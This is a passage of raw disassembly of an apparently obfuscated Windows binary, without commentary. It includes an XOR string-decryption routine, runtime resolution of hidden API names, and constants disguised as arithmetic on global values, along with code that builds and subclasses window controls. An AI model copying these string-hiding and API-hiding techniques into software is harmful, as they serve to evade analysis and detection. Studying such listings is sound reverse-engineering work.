mov eax, 30h
mul esi
mov [ebp+var_29C], eax
mov edi, [ebp+var_298]
mov ebx, eax
mov ds:1000F37Ch[ebx], edi
mov eax, ds:100120A4h
movsx edx, word ptr ds:100120C8h
add eax, edx
cmp [ebp+eax+var_108], 34h
jnz short loc_421D00
push 10012EA2h
lea eax, [ebp+var_253]
push eax
call sub_424F6D
jmp short loc_421D18
; ---------------------------------------------------------------------------
loc_421D00: ; CODE XREF: sub_42149B+850�j
push 10012E94h
call sub_4228CE
pop ecx
push eax
lea edi, [ebp+var_253]
push edi
call sub_424F6D
loc_421D18: ; CODE XREF: sub_42149B+863�j
push 10012E22h
call sub_4228CE
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_253]
push edi
push eax
lea edi, [ebp+var_23F]
push edi
call dword ptr ds:10011634h
push 10012E18h
call sub_4228CE
add esp, 18h
mov [ebp+var_2A0], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2A4], eax
mov edi, eax
push dword ptr ds:1000F37Ch[edi]
mov edi, ds:10012144h
add edi, 2Bh
push edi
push [ebp+var_120]
mov edi, ds:10012190h
add edi, 7
push edi
mov edi, ds:100121C4h
add edi, 5
push edi
push 50000000h
lea edi, [ebp+var_23F]
push edi
mov edi, [ebp+var_2A0]
push edi
mov edi, ds:10012098h
movsx ebx, word ptr ds:100120D8h
add edi, ebx
sub edi, 0Ch
push edi
call dword ptr ds:10010648h
mov [ebp+var_258], eax
push 0
push 2
push 0
push 0
push 5
push 1
mov eax, ds:100120B8h
sub eax, 4
push eax
mov eax, ds:10012158h
add eax, ds:1001218Ch
dec eax
push eax
movsx eax, word ptr ds:10012100h
sub eax, 9
push eax
push 190h
mov eax, ds:10012198h
sub eax, 8
push eax
mov eax, ds:100120C4h
sub eax, 4
push eax
movsx eax, word ptr ds:10012168h
sub eax, 2
push eax
mov eax, ds:100120A8h
add eax, 9
movsx edx, word ptr ds:10012110h
add eax, edx
push eax
call dword ptr ds:1000F250h
mov [ebp+var_130], eax
push 1
push eax
push 30h
push [ebp+var_258]
call dword ptr ds:1000C014h
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2A8], eax
mov [ebp+var_2AC], eax
push dword ptr ds:1000F37Ch[eax]
mov edx, ds:100120FCh
add edx, 121h
add edx, ds:100120B8h
push edx
mov edx, ds:100120ECh
movsx ecx, word ptr ds:10012100h
lea ecx, [ecx+edx+24h]
push ecx
mov ecx, ds:100121B0h
mov ebx, ds:10012094h
add ebx, 45h
add ebx, ecx
push ebx
mov ebx, ds:10012174h
inc ebx
push ebx
push 50800003h
push 10012E0Eh
push 10012E0Fh
add edx, ecx
sub edx, 5
push edx
call dword ptr ds:10010648h
mov edi, [ebp+var_2AC]
mov ds:1000F380h[edi], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2B0], eax
mov [ebp+var_2B4], eax
push dword ptr ds:1000F37Ch[eax]
movsx edx, word ptr ds:10012110h
mov ecx, ds:10012108h
lea edx, [edx+ecx+128h]
push edx
movsx edx, word ptr ds:100120B0h
mov ecx, ds:100120F0h
lea edx, [edx+ecx+30h]
push edx
movsx edx, word ptr ds:100120E8h
mov ecx, ds:100120E4h
add ecx, 44h
add ecx, edx
push ecx
mov ecx, ds:10012104h
add ecx, 3Eh
add ecx, edx
push ecx
push 50800003h
push 10012E0Eh
push 10012E0Fh
movsx edx, word ptr ds:10012148h
sub edx, 3
push edx
call dword ptr ds:10010648h
mov edi, [ebp+var_2B4]
mov ds:1000F384h[edi], eax
mov eax, ds:10012134h
add eax, ds:10012120h
sub eax, 4
mov [ebp+var_102], ax
jmp loc_422035
; ---------------------------------------------------------------------------
loc_421F81: ; CODE XREF: sub_42149B+BAC�j
push 10012E06h
call sub_4228CE
movzx edi, [ebp+var_102]
push edi
push eax
lea edi, [ebp+var_2BE]
push edi
call dword ptr ds:10011634h
lea eax, [ebp+var_2BE]
push eax
mov eax, ds:100120B8h
add eax, ds:100120B4h
sub eax, 0Ch
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2C4], eax
push dword ptr ds:1000F380h[eax]
call dword ptr ds:1000C014h
push 10012DFCh
call sub_4228CE
movzx edi, [ebp+var_102]
mov ebx, ds:100120ECh
inc ebx
add edi, ebx
push edi
push eax
lea edi, [ebp+var_2BE]
push edi
call dword ptr ds:10011634h
add esp, 20h
lea eax, [ebp+var_2BE]
push eax
push dword ptr ds:10012130h
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2C8], eax
push dword ptr ds:1000F384h[eax]
call dword ptr ds:1000C014h
inc [ebp+var_102]
loc_422035: ; CODE XREF: sub_42149B+AE1�j
movzx eax, [ebp+var_102]
mov edx, ds:100121A4h
add edx, 0Dh
cmp eax, edx
jl loc_421F81
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2B8], eax
mov [ebp+var_2BC], eax
push dword ptr ds:1000F37Ch[eax]
movsx edx, word ptr ds:10012110h
add edx, 14h
push edx
mov edx, ds:10012138h
add edx, 4Dh
movsx ecx, word ptr ds:100120E0h
add edx, ecx
push edx
movsx edx, word ptr ds:100120D8h
add edx, 77h
push edx
movsx edx, word ptr ds:1001219Ch
add edx, 29h
push edx
push 50800000h
push 10012E0Eh
push 10012DF7h
push 200h
call dword ptr ds:10010648h
mov edi, [ebp+var_2BC]
mov ds:1000F388h[edi], eax
movsx eax, word ptr ds:100120BCh
add eax, ds:100120ACh
sub eax, 0Ch
push eax
push 58h
push 0CCh
mov eax, 30h
mul esi
mov [ebp-2C0h], eax
push dword ptr ds:1000F388h[eax]
call dword ptr ds:1000C014h
push 10012DEDh
call sub_4228CE
mov [ebp+var_2C4], eax
push 10012DCBh
call sub_4228CE
add esp, 8
mov [ebp+var_2C8], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2CC], eax
mov edi, eax
push dword ptr ds:1000F37Ch[edi]
mov edi, ds:10012138h
add edi, 38h
add edi, ds:100121B0h
push edi
push [ebp+var_120]
movsx edi, word ptr ds:10012154h
add edi, 47h
push edi
movsx edi, word ptr ds:100120F4h
movsx ebx, word ptr ds:10012148h
lea edi, [edi+ebx+8Ah]
push edi
push 50000000h
mov edi, [ebp+var_2C8]
push edi
mov edi, [ebp+var_2C4]
push edi
mov edi, ds:100120FCh
movsx ebx, word ptr ds:1001216Ch
add edi, ebx
sub edi, 0Bh
push edi
call dword ptr ds:10010648h
mov [ebp+var_25C], eax
push 1
push [ebp+var_130]
push 30h
push eax
call dword ptr ds:1000C014h
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2D0], eax
mov [ebp+var_2D4], eax
push dword ptr ds:1000F37Ch[eax]
mov edx, ds:10012178h
add edx, 14h
push edx
mov edx, ds:10012188h
add edx, 93h
add edx, ds:10012198h
push edx
mov edx, ds:1001214Ch
add edx, 0EDh
add edx, ds:10012098h
mov ecx, ds:100120F0h
add ecx, 1Fh
sub edx, ecx
push edx
mov edx, ds:1001213Ch
add edx, 8
push edx
push 50800000h
push 10012DADh
push 10012DC4h
mov edx, ds:100121C0h
add edx, ds:100120C4h
sub edx, 7
push edx
call dword ptr ds:10010648h
mov edi, [ebp+var_2D4]
mov ds:1000F38Ch[edi], eax
push 1
push [ebp+var_130]
mov eax, 30h
push 30h
mul esi
mov [ebp+var_2D8], eax
push dword ptr ds:1000F38Ch[eax]
call dword ptr ds:1000C014h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2DC], eax
mov [ebp+var_2E0], eax
push dword ptr ds:1000F380h[eax]
call dword ptr ds:10011628h
mov edi, [ebp+var_2E0]
mov ds:1000F390h[edi], eax
push 1000134Dh
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2E4], eax
push dword ptr ds:1000F380h[eax]
call dword ptr ds:1000E5F8h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2E8], eax
mov [ebp+var_2EC], eax
push dword ptr ds:1000F384h[eax]
call dword ptr ds:10011628h
mov edi, [ebp+var_2EC]
mov ds:1000F394h[edi], eax
push 1000134Dh
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2F0], eax
push dword ptr ds:1000F384h[eax]
call dword ptr ds:1000E5F8h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2F4], eax
mov [ebp+var_2F8], eax
push dword ptr ds:1000F388h[eax]
call dword ptr ds:10011628h
mov edi, [ebp+var_2F8]
mov ds:1000F398h[edi], eax
push 1000134Dh
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2FC], eax
push dword ptr ds:1000F388h[eax]
call dword ptr ds:1000E5F8h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_300], eax
mov [ebp+var_304], eax
push dword ptr ds:1000F37Ch[eax]
call dword ptr ds:10011628h
mov edi, [ebp+var_304]
mov ds:1000F39Ch[edi], eax
push 1000134Dh
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_308], eax
push dword ptr ds:1000F37Ch[eax]
call dword ptr ds:1000E5F8h
mov eax, 30h
mul esi
mov [ebp+var_30C], eax
push dword ptr ds:1000F380h[eax]
call dword ptr ds:1000EA40h
loc_4223D4: ; CODE XREF: sub_42149B+10�j
; sub_42149B+21�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_42149B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4223D9 proc near ; CODE XREF: sub_41B939+1C4�p
; sub_41C561+20�p ...
var_120A = byte ptr -120Ah
var_110B = byte ptr -110Bh
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 120Ch
call sub_424F4D
push ebx
push esi
push edi
push 1001297Eh
call sub_4228CE
push eax
lea edi, [ebp+var_FFF]
push edi
call dword ptr ds:10011634h
add esp, 0Ch
mov eax, ds:100120ECh
mov esi, eax
add esi, ds:10012144h
sub esi, 0Ah
jmp short loc_422436
; ---------------------------------------------------------------------------
loc_422416: ; CODE XREF: sub_4223D9+63�j
cmp [ebp+esi+var_FFF], 23h
jnz short loc_422435
mov eax, ds:100120F8h
add eax, ds:10012118h
sub eax, 3
mov [ebp+esi+var_FFF], al
loc_422435: ; CODE XREF: sub_4223D9+45�j
inc esi
loc_422436: ; CODE XREF: sub_4223D9+3B�j
cmp esi, 0FFFh
jb short loc_422416
mov eax, ds:100120F8h
add eax, ds:10012184h
sub eax, 8
mov [ebp+var_1004], eax
mov eax, ds:10012108h
mov ebx, eax
add ebx, ds:1001212Ch
sub ebx, 5
cmp [ebp+arg_0], 0
jnz short loc_4224C1
loc_422468: ; CODE XREF: sub_4223D9+E6�j
mov eax, [ebp+arg_4]
cmp [ebp+var_1004], eax
jnz short loc_42248A
lea eax, [ebp+ebx+var_FFF]
push eax
push 10011670h
call sub_424F6D
jmp loc_422720
; ---------------------------------------------------------------------------
loc_42248A: ; CODE XREF: sub_4223D9+98�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_422494: ; CODE XREF: sub_4223D9+C0�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_422494
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
mov edx, ds:100121A0h
sub edx, 6
cmp eax, edx
jz loc_422720
jmp short loc_422468
; ---------------------------------------------------------------------------
loc_4224C1: ; CODE XREF: sub_4223D9+8D�j
mov eax, ds:10012290h
mov [ebp+var_1008], eax
mov eax, ds:10012094h
movsx edx, word ptr ds:100120E0h
add eax, edx
sub eax, 6
mov edx, [ebp+arg_0]
movsx ecx, word ptr ds:10012090h
dec ecx
mov [edx+eax], cl
movsx eax, word ptr ds:10012180h
movsx edx, word ptr ds:100121A8h
mov ebx, eax
add ebx, edx
sub ebx, 6
mov eax, ds:100121A4h
mov [ebp+var_1004], eax
loc_42250B: ; CODE XREF: sub_4223D9+31F�j
push 10012973h
call sub_4228CE
push eax
lea edi, [ebp+var_110B]
push edi
call sub_424F6D
lea eax, [ebp+ebx+var_FFF]
push eax
lea eax, [ebp+var_110B]
push eax
call dword ptr ds:1000C020h
add esp, 0Ch
call dword ptr ds:10011BACh
mov ecx, 14h
cdq
idiv ecx
mov [ebp+var_100C], edx
mov eax, ds:100120B4h
sub eax, 6
cmp edx, eax
jnb loc_422643
push [ebp+var_1008]
lea eax, [ebp+var_120A]
push eax
call sub_41E5D9
mov eax, ds:10012198h
add eax, ds:100120D4h
sub eax, 8
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_41DB51
add esp, 14h
mov edi, ds:100120B8h
add edi, 0FFF3h
movsx edx, word ptr ds:100120B0h
add edi, edx
cmp eax, edi
jnz short loc_4225D1
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call dword ptr ds:1000C020h
push 1001296Eh
call sub_4228CE
push eax
push [ebp+arg_0]
call dword ptr ds:1000C020h
add esp, 14h
loc_4225D1: ; CODE XREF: sub_4223D9+1CF�j
mov eax, ds:1001217Ch
sub eax, 5
push eax
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call sub_41DB51
add esp, 0Ch
mov edi, ds:10012164h
add edi, 0FFFDh
add edi, ds:100121C8h
cmp eax, edi
jnz short loc_42263D
push 10012963h
call sub_4228CE
push eax
push [ebp+arg_0]
call dword ptr ds:1000C020h
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call dword ptr ds:1000C020h
push 1001295Eh
call sub_4228CE
push eax
push [ebp+arg_0]
call dword ptr ds:1000C020h
add esp, 20h
loc_42263D: ; CODE XREF: sub_4223D9+227�j
inc [ebp+var_1008]
loc_422643: ; CODE XREF: sub_4223D9+17F�j
push [ebp+var_1004]
call sub_424130
pop ecx
mov [ebp+var_100C], eax
mov ecx, ds:100120B4h
sub ecx, 6
cmp eax, ecx
jnb short loc_4226C3
mov eax, ds:10012184h
movsx edx, word ptr ds:10012154h
add eax, edx
sub eax, 0Dh
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_41DB51
add esp, 0Ch
mov edi, ds:10012160h
add edi, 0FFF4h
add edi, ds:100121B8h
cmp eax, edi
jnz short loc_4226C3
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call dword ptr ds:1000C020h
push 10012959h
call sub_4228CE
push eax
push [ebp+arg_0]
call dword ptr ds:1000C020h
add esp, 14h
loc_4226C3: ; CODE XREF: sub_4223D9+287�j
; sub_4223D9+2C1�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_4226CD: ; CODE XREF: sub_4223D9+2F9�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4226CD
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
mov edx, ds:100120A4h
add edx, ds:1001213Ch
sub edx, 4
cmp eax, edx
jnz loc_42250B
push 10012954h
call sub_4228CE
push eax
push [ebp+arg_0]
call dword ptr ds:1000C020h
add esp, 0Ch
mov eax, [ebp+var_1008]
mov ds:10012290h, eax
loc_422720: ; CODE XREF: sub_4223D9+AC�j
; sub_4223D9+E0�j
pop edi
pop esi
pop ebx
leave
retn
sub_4223D9 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 2000h
call sub_424F4D
push esi
push edi
push 1FFFh
lea eax, [ebp-1FFFh]
push eax
push dword ptr [ebp+8]
call dword ptr ds:10011BA4h
push 1001293Fh
call sub_4228CE
mov edi, ds:100120E4h
dec edi
push edi
push eax
lea edi, [ebp-1FFFh]
push edi
call sub_41DB51
add esp, 10h
mov esi, ds:100121C0h
add esi, 0FFF8h
add esi, ds:100121ACh
cmp eax, esi
jz short loc_42278A
push dword ptr [ebp+8]
call sub_41F2AD
pop ecx
loc_42278A: ; CODE XREF: .data:0042277F�j
xor eax, eax
inc eax
pop edi
pop esi
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_422793 proc near ; CODE XREF: .data:0042302D�p
push edi
push 10012932h
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:100121E4h, eax
test eax, eax
jnz short loc_4227C6
push 10012925h
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:100121E4h, eax
loc_4227C6: ; CODE XREF: sub_422793+1A�j
push 10012912h
call sub_4228CE
push eax
push dword ptr ds:100121E4h
call dword ptr ds:1000E1F8h
mov ds:10011BB4h, eax
push 100128FEh
call sub_4228CE
push eax
push dword ptr ds:100121E4h
call dword ptr ds:1000E1F8h
mov ds:1000E620h, eax
push 100128EEh
call sub_4228CE
push eax
push dword ptr ds:100121E4h
call dword ptr ds:1000E1F8h
mov ds:1000E0D0h, eax
push 100128DCh
call sub_4228CE
push eax
push dword ptr ds:100121E4h
call dword ptr ds:1000E1F8h
mov ds:1000E0D8h, eax
push 100128CDh
call sub_4228CE
add esp, 14h
push eax
push dword ptr ds:100121E4h
call dword ptr ds:1000E1F8h
mov ds:10011644h, eax
pop edi
retn
sub_422793 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422857 proc near ; CODE XREF: sub_41B939+A4�p
; sub_41E9E2+14B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov eax, ds:100120E4h
movsx edx, word ptr ds:100120D8h
mov esi, eax
add esi, edx
sub esi, 7
jmp short loc_4228AA
; ---------------------------------------------------------------------------
loc_422875: ; CODE XREF: sub_422857+56�j
call dword ptr ds:10011BACh
mov edi, ds:10012164h
add edi, 5Dh
movsx edx, word ptr ds:10012110h
add edi, edx
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
add edi, eax
mov edx, edi
mov [ebx+esi], dl
inc esi
loc_4228AA: ; CODE XREF: sub_422857+1C�j
cmp esi, [ebp+arg_4]
jl short loc_422875
mov eax, [ebp+arg_4]
movsx edx, word ptr ds:10012148h
sub edx, 3
mov [ebx+eax], dl
mov eax, ebx
pop edi
pop esi
pop ebx
pop ebp
retn
sub_422857 endp
; ---------------------------------------------------------------------------
dw 1B8h
dd 0C2800040h
db 8, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4228CE proc near ; CODE XREF: .data:0041A95F�p
; .data:0041AA11�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword ptr ds:100121D0h, 0
jnz short loc_4228F6
push 10011BC0h
call dword ptr ds:1000D008h
mov dword ptr ds:100121D0h, 1
loc_4228F6: ; CODE XREF: sub_4228CE+11�j
mov esi, ds:10012118h
add esi, ds:1001211Ch
dec esi
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+1]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
mov edx, ds:10012184h
sub edx, 3
cmp eax, edx
jz short loc_4229A8
push 10011BC0h
call dword ptr ds:1001165Ch
movsx eax, word ptr ds:100120E0h
add eax, 3
mov [ebp+var_2], ax
jmp short loc_42295C
; ---------------------------------------------------------------------------
loc_422947: ; CODE XREF: sub_4228CE+98�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+2]
xor edx, ecx
mov [eax], dl
inc [ebp+var_2]
loc_42295C: ; CODE XREF: sub_4228CE+77�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_422947
mov eax, ds:10012160h
add eax, ds:10012108h
sub eax, 8
movsx edx, word ptr ds:10012150h
sub edx, 5
mov [edi+eax], dl
mov eax, ds:1001214Ch
add eax, ds:10012164h
sub eax, 5
mov edx, ds:10012178h
sub edx, 3
mov [edi+eax], dl
push 10011BC0h
call dword ptr ds:1001064Ch
loc_4229A8: ; CODE XREF: sub_4228CE+5C�j
lea eax, [edi+3]
pop edi
pop esi
pop ebx
leave
retn
sub_4228CE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
mov edi, [ebp+0Ch]
mov eax, [ebp+18h]
mov [ebp+18h], ax
mov eax, ds:10012164h
add eax, 0F8h
add eax, ds:100120E4h
cmp edi, eax
jnz short loc_4229DF
push dword ptr [ebp+1Ch]
call sub_41F4F7
pop ecx
xor eax, eax
jmp short loc_4229FF
; ---------------------------------------------------------------------------
loc_4229DF: ; CODE XREF: .data:004229D0�j
mov eax, ds:100120D4h
add eax, 102h
cmp edi, eax
jnz short loc_4229FA
push dword ptr [ebp+1Ch]
call sub_4242A2
pop ecx
xor eax, eax
jmp short loc_4229FF
; ---------------------------------------------------------------------------
loc_4229FA: ; CODE XREF: .data:004229EB�j
mov eax, 80020003h
loc_4229FF: ; CODE XREF: .data:004229DD�j
; .data:004229F8�j
pop edi
pop ebp
retn 24h
; =============== S U B R O U T I N E =======================================
sub_422A04 proc near ; CODE XREF: .data:00423037�p
push edi
push 100128C2h
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:100121ECh, eax
test eax, eax
jnz short loc_422A37
push 100128B7h
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:100121ECh, eax
loc_422A37: ; CODE XREF: sub_422A04+1A�j
cmp dword ptr ds:100121ECh, 0
jz short loc_422A5D
push 100128A1h
call sub_4228CE
pop ecx
push eax
push dword ptr ds:100121ECh
call dword ptr ds:1000E1F8h
mov ds:1000E600h, eax
loc_422A5D: ; CODE XREF: sub_422A04+3A�j
pop edi
retn
sub_422A04 endp
; ---------------------------------------------------------------------------
db 0Fh
dd 21A805BFh, 50401001h, 166015FFh
db 1, 10h, 0C3h
; =============== S U B R O U T I N E =======================================
sub_422A6F proc near ; CODE XREF: .data:00420FC1�p
push edi
push 10012893h
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:100121D8h, eax
test eax, eax
jnz short loc_422AA2
push 10012885h
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:100121D8h, eax
loc_422AA2: ; CODE XREF: sub_422A6F+1A�j
push 1001287Bh
call sub_4228CE
push eax
push dword ptr ds:100121D8h
call dword ptr ds:1000E1F8h
mov ds:10011630h, eax
push 10012870h
call sub_4228CE
push eax
push dword ptr ds:100121D8h
call dword ptr ds:1000E1F8h
mov ds:1000C030h, eax
push 10012868h
call sub_4228CE
push eax
push dword ptr ds:100121D8h
call dword ptr ds:1000E1F8h
mov ds:1000C054h, eax
push 10012860h
call sub_4228CE
push eax
push dword ptr ds:100121D8h
call dword ptr ds:1000E1F8h
mov ds:1000EA38h, eax
push 10012856h
call sub_4228CE
push eax
push dword ptr ds:100121D8h
call dword ptr ds:1000E1F8h
mov ds:1000EA2Ch, eax
push 1001284Ch
call sub_4228CE
push eax
push dword ptr ds:100121D8h
call dword ptr ds:1000E1F8h
mov ds:10011648h, eax
push 10012842h
call sub_4228CE
push eax
push dword ptr ds:100121D8h
call dword ptr ds:1000E1F8h
mov ds:10010634h, eax
push 10012838h
call sub_4228CE
push eax
push dword ptr ds:100121D8h
call dword ptr ds:1000E1F8h
mov ds:10010640h, eax
push 10012830h
call sub_4228CE
push eax
push dword ptr ds:100121D8h
call dword ptr ds:1000E1F8h
mov ds:10011BACh, eax
push 10012827h
call sub_4228CE
push eax
push dword ptr ds:100121D8h
call dword ptr ds:1000E1F8h
mov ds:10011600h, eax
push 1001281Dh
call sub_4228CE
push eax
push dword ptr ds:100121D8h
call dword ptr ds:1000E1F8h
mov ds:1000C020h, eax
push 10012812h
call sub_4228CE
push eax
push dword ptr ds:100121D8h
call dword ptr ds:1000E1F8h
mov ds:10011634h, eax
push 10012806h
call sub_4228CE
push eax
push dword ptr ds:100121D8h
call dword ptr ds:1000E1F8h
mov ds:1000F24Ch, eax
push 100127FCh
call sub_4228CE
add esp, 38h
push eax
push dword ptr ds:100121D8h
call dword ptr ds:1000E1F8h
mov ds:1000E1F4h, eax
pop edi
retn
sub_422A6F endp
; =============== S U B R O U T I N E =======================================
sub_422C2F proc near ; CODE XREF: .data:0042303C�p
push edi
push 100127EEh
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:100121F0h, eax
test eax, eax
jnz short loc_422C62
push 100127E0h
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:100121F0h, eax
loc_422C62: ; CODE XREF: sub_422C2F+1A�j
cmp dword ptr ds:100121F0h, 0
jz short loc_422C87
movsx eax, word ptr ds:10012148h
add eax, 2
push eax
push dword ptr ds:100121F0h
call dword ptr ds:1000E1F8h
mov ds:1000C01Ch, eax
loc_422C87: ; CODE XREF: sub_422C2F+3A�j
pop edi
retn
sub_422C2F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 21Ch
push ebx
push esi
push edi
lea eax, [ebp-210h]
push eax
push 1000E0F0h
call sub_41B0D6
add esp, 8
mov [ebp-208h], eax
test eax, eax
jnz short loc_422CBA
xor eax, eax
jmp loc_422E4E
; ---------------------------------------------------------------------------
loc_422CBA: ; CODE XREF: .data:00422CB1�j
mov eax, ds:100120A0h
movsx edx, word ptr ds:100120B0h
add eax, edx
sub eax, 8
mov [ebp-204h], eax
loc_422CD1: ; CODE XREF: .data:00422E3A�j
mov eax, [ebp-204h]
mov edx, [ebp-208h]
lea ecx, [edx+eax]
or eax, 0FFFFFFFFh
loc_422CE3: ; CODE XREF: .data:00422CE8�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_422CE3
mov [ebp-20Ch], eax
cmp dword ptr [ebp-20Ch], 0FFh
jnb short loc_422D20
mov eax, [ebp-204h]
mov edx, ds:100121B8h
sub edx, 2
add eax, edx
add eax, [ebp-208h]
push eax
lea eax, [ebp-0FFh]
push eax
call sub_424F6D
loc_422D20: ; CODE XREF: .data:00422CFA�j
mov eax, ds:1001215Ch
mov esi, eax
add esi, ds:10012178h
sub esi, 7
jmp short loc_422D57
; ---------------------------------------------------------------------------
loc_422D32: ; CODE XREF: .data:00422D69�j
cmp byte ptr [ebp+esi-0FFh], 28h
jnz short loc_422D44
mov byte ptr [ebp+esi-0FFh], 2Bh
loc_422D44: ; CODE XREF: .data:00422D3A�j
cmp byte ptr [ebp+esi-0FFh], 29h
jnz short loc_422D56
mov byte ptr [ebp+esi-0FFh], 3Dh
loc_422D56: ; CODE XREF: .data:00422D4C�j
inc esi
loc_422D57: ; CODE XREF: .data:00422D30�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_422D60: ; CODE XREF: .data:00422D65�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_422D60
cmp esi, eax
jb short loc_422D32
push 0FFh
lea eax, [ebp-1FEh]
push eax
lea eax, [ebp-0FFh]
push eax
call sub_423767
add esp, 0Ch
mov ebx, eax
mov edi, ds:10012160h
sub edi, 8
jmp short loc_422DC1
; ---------------------------------------------------------------------------
loc_422D93: ; CODE XREF: .data:00422DC3�j
movsx eax, byte ptr [ebp+edi-1FEh]
mov [ebp-218h], eax
mov eax, edi
mul edi
mov [ebp-21Ch], eax
mov eax, [ebp-218h]
mov edx, [ebp-21Ch]
sub eax, edx
mov [ebp+edi-1FEh], al
inc edi
loc_422DC1: ; CODE XREF: .data:00422D91�j
cmp edi, ebx
jb short loc_422D93
movsx eax, word ptr ds:10012110h
sub eax, 3
push eax
push dword ptr [ebp+8]
lea eax, [ebp-1FEh]
push eax
call sub_41DB51
add esp, 0Ch
mov [ebp-214h], eax
mov eax, ds:1001214Ch
add eax, 0FFF8h
add eax, ds:100121B4h
cmp [ebp-214h], eax
jz short loc_422E11
push dword ptr [ebp-208h]
call dword ptr ds:1000E618h
xor eax, eax
inc eax
jmp short loc_422E4E
; ---------------------------------------------------------------------------
loc_422E11: ; CODE XREF: .data:00422DFE�j
mov eax, [ebp-20Ch]
mov edx, ds:100121A4h
add edx, ds:10012160h
sub edx, 3
add eax, edx
add [ebp-204h], eax
mov eax, [ebp-210h]
cmp [ebp-204h], eax
jb loc_422CD1
push dword ptr [ebp-208h]
call dword ptr ds:1000E618h
xor eax, eax
loc_422E4E: ; CODE XREF: .data:00422CB5�j
; .data:00422E0F�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422E53 proc near ; CODE XREF: sub_41E2FF+2CD�p
; sub_423CF4+23B�p
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_316 = byte ptr -316h
var_212 = byte ptr -212h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 32Ch
push ebx
push esi
push edi
push [ebp+arg_4]
call dword ptr ds:10011630h
pop ecx
push [ebp+arg_0]
lea eax, [ebp+var_316]
push eax
call sub_424F6D
lea ecx, [ebp+var_316]
or eax, 0FFFFFFFFh
loc_422E81: ; CODE XREF: sub_422E53+33�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_422E81
mov edx, ds:10012160h
sub edx, 7
mov ebx, eax
sub ebx, edx
